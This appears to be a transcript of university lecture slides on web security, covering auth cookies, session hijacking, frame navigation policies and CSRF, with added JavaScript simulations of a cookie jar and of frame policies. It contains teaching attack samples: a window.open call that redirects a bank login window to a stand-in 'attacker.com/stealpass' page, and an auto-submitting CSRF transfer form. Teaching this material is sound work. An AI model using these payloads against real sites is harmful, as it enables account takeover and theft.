websec-2 · pages.cs.wisc.edu/~ace/media/lectures/websec-2.pdf · today: authentication cookies +...
TRANSCRIPT
today
Authentication cookies + session hijacking
Browser security model, frame policies
Cross-site request forgery
Announcement: No class on Wednesday, Feb 17
review
web ecosystem
Browser  --->  http://linkedin.com
  transport: tcp/ip, [tls?], http
  content:   html + css + javascript + ajax / websockets
linkedin.com:
  web server -- nginx, apache, ...
  app server -- ruby, php, django, asp, node.js, ...
  datastore  -- sql, nosql, ...
dom
From http://w3schools.com/htmldom/default.asp
Document object model (DOM) Object-oriented way to organize objects in a web page
Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]
Methods: document.write(document.referrer)
browser security model
Should be safe to visit a malicious website
Should be safe to visit multiple websites simultaneously
Should be safe to delegate content
browser vs os
Browser handles multiple sites, must maintain separate security contexts for each

                 Operating System                          Browser
Primitives       System calls, processes, files            Document object model, frames, cookies, passwords
Principals       Users, groups                             Origins
Vulnerabilities  Buffer overflows, privilege escalation,   Cross-site scripting (XSS), cross-site request
                 ...                                       forgery (XSRF), ...
cookies
cookies
Browser -> website.com:   GET …
website.com -> Browser:   HTTP header
                          Set-Cookie: NAME=value; domain=(when to send); path=(when to send); secure=(only send over TLS/HTTPS); expires=(when it expires);
- Cookies permit browsers to store state associated with a website
auth cookies
Browser -> website.com:    POST /login.html HTTP/1.1
                           username=user&passwd=pass
website.com (server side): db.users.insert({ username: "user", "auth-cookie": "981mnd89...", login: true })
website.com -> Browser:    HTTP/1.1 200 OK
                           Set-Cookie: auth=981mndg897asdfd
Browser -> website.com:    GET /index.html HTTP/1.1
                           Cookie: auth=981mndg897asdfd
cookie security issues
What could possibly go wrong?
Integrity problems: HTTPS cookies can be overwritten by HTTP cookies (the cookie store keys on name, domain and path, not on scheme; newer browsers refuse to let a plain-HTTP response touch a Secure cookie, and the __Secure- / __Host- name prefixes let a site opt in to that). Malicious clients can modify cookies, so the server must not trust any cookie value it cannot look up or verify.
Scoping rules can be abused: blog.example.com can read/set cookies for example.com.
Privacy: cookies can be used to track individuals around the internet.
HTTP auth cookies sent without encryption -- session hijacking.
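The domain/path/secure attributes described above and the two scoping problems just listed, worked through in an added example (this is not code from the lecture): a small cookie jar that applies the RFC 6265 domain-match and path-match rules to decide which cookies a browser would attach to a request. The strictSecure option, which models the "leave Secure cookies alone" behaviour of newer browsers, and the example hosts and cookie names are this example's own.

```javascript
// Parse one Set-Cookie header into its name, value and scoping attributes.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = nameValue.indexOf('=');
  const c = { name: nameValue.slice(0, eq), value: nameValue.slice(eq + 1),
              domain: null, path: null, secure: false, hostOnly: true };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    const key = k.toLowerCase();
    if (key === 'domain') c.domain = v.toLowerCase().replace(/^\./, '');
    else if (key === 'path') c.path = v;
    else if (key === 'secure') c.secure = true;
  }
  return c;
}

// RFC 6265 5.1.3 domain-match: equal, or host ends with "." + domain.
function domainMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}
// RFC 6265 5.1.4 path-match.
function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || reqPath[cookiePath.length] === '/';
}
// RFC 6265 5.1.4 default-path: the request path up to, not including, its last "/".
function defaultPath(reqPath) {
  const i = reqPath.lastIndexOf('/');
  return i <= 0 ? '/' : reqPath.slice(0, i);
}

class CookieJar {
  // strictSecure models the "leave Secure cookies alone" rule of newer browsers.
  constructor({ strictSecure = false } = {}) { this.cookies = []; this.strictSecure = strictSecure; }

  // Store a cookie from a response to responseUrl. Returns false if the browser rejects it.
  store(responseUrl, setCookieHeader) {
    const url = new URL(responseUrl);
    const c = parseSetCookie(setCookieHeader);
    if (c.domain === null) {
      c.domain = url.hostname;                  // no Domain attribute: host-only cookie
    } else {
      // A host may only widen scope to a domain that covers it: blog.example.com may set
      // Domain=example.com (the scoping problem above) but not Domain=other.com.
      if (!domainMatches(url.hostname, c.domain)) return false;
      c.hostOnly = false;
    }
    if (c.path === null) c.path = defaultPath(url.pathname);
    // Cookies are keyed on (name, domain, path), not scheme: by default an http: response
    // replaces a cookie that an https: response set, even one marked Secure.
    const idx = this.cookies.findIndex((o) => o.name === c.name && o.domain === c.domain && o.path === c.path);
    const clobbersSecure = idx >= 0 && this.cookies[idx].secure;
    if (this.strictSecure && url.protocol !== 'https:' && (c.secure || clobbersSecure)) return false;
    if (idx >= 0) this.cookies[idx] = c; else this.cookies.push(c);
    return true;
  }

  // The Cookie header value a request to requestUrl would carry ('' if none).
  cookieHeaderFor(requestUrl) {
    const url = new URL(requestUrl);
    return this.cookies
      .filter((c) => (c.hostOnly ? url.hostname === c.domain : domainMatches(url.hostname, c.domain)))
      .filter((c) => pathMatches(url.pathname, c.path))
      .filter((c) => !c.secure || url.protocol === 'https:')
      .map((c) => `${c.name}=${c.value}`)
      .join('; ');
  }
}

function demo() {
  const jar = new CookieJar();
  jar.store('https://example.com/login', 'sessionId=b98fjhw7; Path=/; Secure');
  jar.store('https://blog.example.com/post', 'tracking=abc; Domain=example.com');
  console.log('blog.example.com -> Domain=other.com accepted?', jar.store('https://blog.example.com/post', 'x=1; Domain=other.com'));
  console.log('https://www.example.com/ sends:', jar.cookieHeaderFor('https://www.example.com/'));
  console.log('https://example.com/account sends:', jar.cookieHeaderFor('https://example.com/account'));
  console.log('http://example.com/account sends:', jar.cookieHeaderFor('http://example.com/account'));
  // An injected plain-HTTP response overwrites the Secure session cookie (session fixation).
  jar.store('http://example.com/', 'sessionId=attacker; Path=/');
  console.log('after http overwrite, https://example.com/account sends:', jar.cookieHeaderFor('https://example.com/account'));
  const strict = new CookieJar({ strictSecure: true });
  strict.store('https://example.com/login', 'sessionId=b98fjhw7; Path=/; Secure');
  console.log('strict jar accepts http overwrite?', strict.store('http://example.com/', 'sessionId=attacker; Path=/'));
}
demo();
```

Note what the secure attribute does and does not do: it stops the cookie from being sent over http:, which is the Firesheep problem, but in the default jar it does not stop an http: response from replacing the cookie, which is the integrity problem.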
firesheep
Firesheep (a 2010 Firefox extension) sniffed open Wi-Fi for the cookies of sites that used HTTPS only for the login form and then sent the auth cookie in the clear on every other request; importing a captured cookie logs the attacker in as the victim.
Firesheep steals session authentication cookies ==> session hijacking
frame policies
javascript contexts
(figure: a page made of several frames, each running its own script in a separate context: JavaScript context 1, JavaScript context 2, JavaScript context 3)
[slide credit: V. Shmatikov, CS380]
dom access control
(figure: a JavaScript context holds an object reference and asks "Access?"; the DOM reference monitor decides "Is this context allowed to access object?" before the reference reaches the object)
[slide credit: V. Shmatikov, CS380]
frame relationships
Child
Sibling
Descendant
Ancestor
frame policies
canScript(A,B): Can frame A execute a script that manipulates arbitrary DOM elements in frame B?
canNavigate(A,B): Can frame A change the origin of content for frame B? e.g. frameB.src = "http://newurl.com/page5.html"
same-origin policy
Each frame within a page has an origin. Example: https://fb.com:99/login.js has origin (protocol, host, port) = (https, fb.com, 99)
Same-origin policy: canScript(A,B) only when origin(A) == origin(B)
JavaScript origin: based on containing frame, not <script src>
What about canNavigate(A,B)?
frame policies
canNavigate(A,B):
Permissive: any frame can navigate any other frame
Child: can only navigate another frame if you are its parent
Descendant: can only navigate another frame if you are an ancestor of it
Which policy should be used?
think-pair-share
legacy browsers
Browser            Policy
IE 6 (default)     Permissive
IE 6 (option)      Child
IE 7 (default)     Descendant
IE 7 (with Flash)  Permissive
Firefox 2          Window
Safari 3           Permissive
Opera 9            Window
HTML 5 (draft)     Child
permissive problems
The bank's login page opens in a window named "awglogin". Under the permissive policy any other page the user has open, even in a different tab, can navigate that window by name:
window.open("https://attacker.com/stealpass", "awglogin");
The window the user opened from the bank now shows the attacker's page, and the password the user types goes to attacker.com.
descendant policy
Browser            Policy
IE 7 (default)     Descendant
IE 7 (with Flash)  Descendant
Firefox 2          Descendant
Safari 3           Descendant
Opera 9            (multiple)
HTML 5 (draft)     Descendant
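The frame policies above and the awglogin attack, worked through in an added example that is not from the lecture: a frame tree with canScript under the same-origin policy and canNavigate under the Permissive, Window, Child and Descendant policies, then the window.open navigation attempted from an ad frame inside the bank's page and from a separate attacker tab. The scenario (bank.com, attacker.com, frame names) and the function names are this example's own.

```javascript
// A frame in a browsing-context tree. `name` is what window.open(url, name) targets.
class Frame {
  constructor(url, name = '', parent = null) {
    this.url = new URL(url);
    this.name = name;
    this.parent = parent;
    this.children = [];
    if (parent) parent.children.push(this);
  }
  // Origin = (protocol, host, port); URL.origin normalises the default port away.
  get origin() { return this.url.origin; }
  get top() { let f = this; while (f.parent) f = f.parent; return f; }
  isAncestorOf(other) {
    for (let f = other.parent; f; f = f.parent) if (f === this) return true;
    return false;
  }
}

// Same-origin policy: A may script B's DOM only when the origins are equal.
function canScript(a, b) { return a.origin === b.origin; }

// The navigation policies from the slides, as predicates canNavigate(A, B).
const POLICIES = {
  permissive: (a, b) => true,                         // any frame, even in another window
  window:     (a, b) => a.top === b.top,              // any frame in the same top-level window
  child:      (a, b) => a === b || b.parent === a,    // only your direct children (and yourself)
  descendant: (a, b) => a === b || a.isAncestorOf(b), // any frame below you
};

function canNavigate(policy, a, b) {
  const rule = POLICIES[policy];
  if (!rule) throw new Error(`unknown policy: ${policy}`);
  return rule(a, b);
}

// frameB.src = url  /  window.open(url, nameOfB): A tries to change where B's content comes from.
function navigate(policy, a, b, url) {
  if (!canNavigate(policy, a, b)) return false;
  b.url = new URL(url);
  return true;
}

// Constructed scenario: the bank's page holds a login frame named "awglogin" and a
// third-party ad frame; the attacker also has a page open in a second tab.
function buildScenario() {
  const bank = new Frame('https://bank.com/');
  const login = new Frame('https://bank.com/login', 'awglogin', bank);
  const ad = new Frame('https://attacker.com/ad', 'ad', bank);
  const attackerTab = new Frame('https://attacker.com/');
  return { bank, login, ad, attackerTab };
}

// Where does the login frame end up under a given policy when the attacker's ad frame
// (or separate tab) runs window.open("https://attacker.com/stealpass", "awglogin")?
function loginOriginAfterAttack(policy, fromTab = false) {
  const { login, ad, attackerTab } = buildScenario();
  const attacker = fromTab ? attackerTab : ad;
  navigate(policy, attacker, login, 'https://attacker.com/stealpass');
  return login.origin;
}

function demo() {
  const { bank, login, ad } = buildScenario();
  console.log('canScript(ad, login):  ', canScript(ad, login));   // false: different origins
  console.log('canScript(bank, login):', canScript(bank, login)); // true
  for (const policy of Object.keys(POLICIES)) {
    console.log(`${policy.padEnd(10)} ad frame -> login: ${loginOriginAfterAttack(policy)}`
      + `   attacker tab -> login: ${loginOriginAfterAttack(policy, true)}`);
  }
}
demo();
```

Running it shows why the tables moved to Descendant: Permissive lets both the embedded ad and the separate tab replace the login frame, Window still lets the embedded ad do it, and only Child and Descendant leave the login frame at bank.com while still letting the bank's own top frame navigate it.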
XSRF
attack
1. The user logs in to bank.com (login: user/pw). The browser stores the cookie sessionId=b98fjhw7, scoped to bank.com, with the secure flag.
2. The user visits blog.com (GET /blog HTTP/1.1). The attacker's page there contains:
   <form action="https://bank.com/transfer" method="POST" target="invisibleFrame">
     <input name="recipient" value="attacker"/>
     <input name="amount" value="100USD"/>
   </form>
   <script>document.forms[0].submit()</script>
3. The browser submits the form to bank.com and, because the cookie's scope matches, attaches the user's credentials:
   POST /transfer HTTP/1.1
   Cookie: sessionId=b98fjhw7

   recipient=attacker&amount=100USD
4. bank.com sees a valid session and answers: HTTP/1.1 200 OK <html>Transfer completed</html>
The attacker's page made the browser send the user's credentials with a request the user never intended.
Attack called: Cross-site request forgery, XSRF or CSRF
recap
Authentication cookies and session hijacking
JavaScript contexts, frame-policies
Problems with permissive policies
Cross-site request forgery
No class on Wednesday: see you next Monday; good luck on assignment one!